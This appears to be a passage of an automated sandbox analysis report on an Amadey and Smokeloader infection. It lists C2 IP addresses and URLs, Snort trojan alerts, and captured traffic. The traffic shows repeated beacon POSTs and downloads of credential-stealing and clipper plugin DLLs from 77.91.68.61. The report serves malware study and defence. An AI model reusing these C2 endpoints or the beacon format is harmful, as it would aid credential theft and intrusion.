Source:	Binary string: protobuf-net.pdbSHA256}Lq source: ohcompetitive.exe, 0000000D.00000002.754662860.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.787895356.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.754662860.000000000430E000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.726837895.000000000331C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: pdates.exe, 0000000C.00000002.908312889.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001A.00000002.908709321.000000006E80F000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: protobuf-net.pdb source: ohcompetitive.exe, 0000000D.00000002.754662860.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.787895356.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.754662860.000000000430E000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.726837895.000000000331C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: eex.pdb source: explorer.exe, 00000001.00000000.419758737.00007FFA13021000.00000020.00000001.01000000.00000005.sdmp

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6F2B.exe	Code function: 5_2_00932390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	5_2_00932390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	Code function: 6_2_00CE2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	6_2_00CE2390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Code function: 7_2_011BE59B FindFirstFileExW,	7_2_011BE59B

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 77.91.124.47 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 77.91.68.248 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 77.91.68.29 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49718 -> 77.91.68.29:80
Source: Traffic	Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49724 -> 77.91.68.29:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 77.91.68.61/rock/index.php
Source: Malware configuration extractor	URLs: 77.91.124.84:19071
Source: Malware configuration extractor	URLs: http://77.91.68.29/fks/
Source: Malware configuration extractor	URLs: http://77.91.68.29/fks/

Source: global traffic	HTTP traffic detected: GET /67ou2d.mp4 HTTP/1.1Host: files.catbox.moeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /pvcvd6.wav HTTP/1.1Host: files.catbox.moeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: GET /rock/Plugins/cred64.dll HTTP/1.1Host: 77.91.68.61
Source: global traffic	HTTP traffic detected: GET /rock/Plugins/clip64.dll HTTP/1.1Host: 77.91.68.61
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
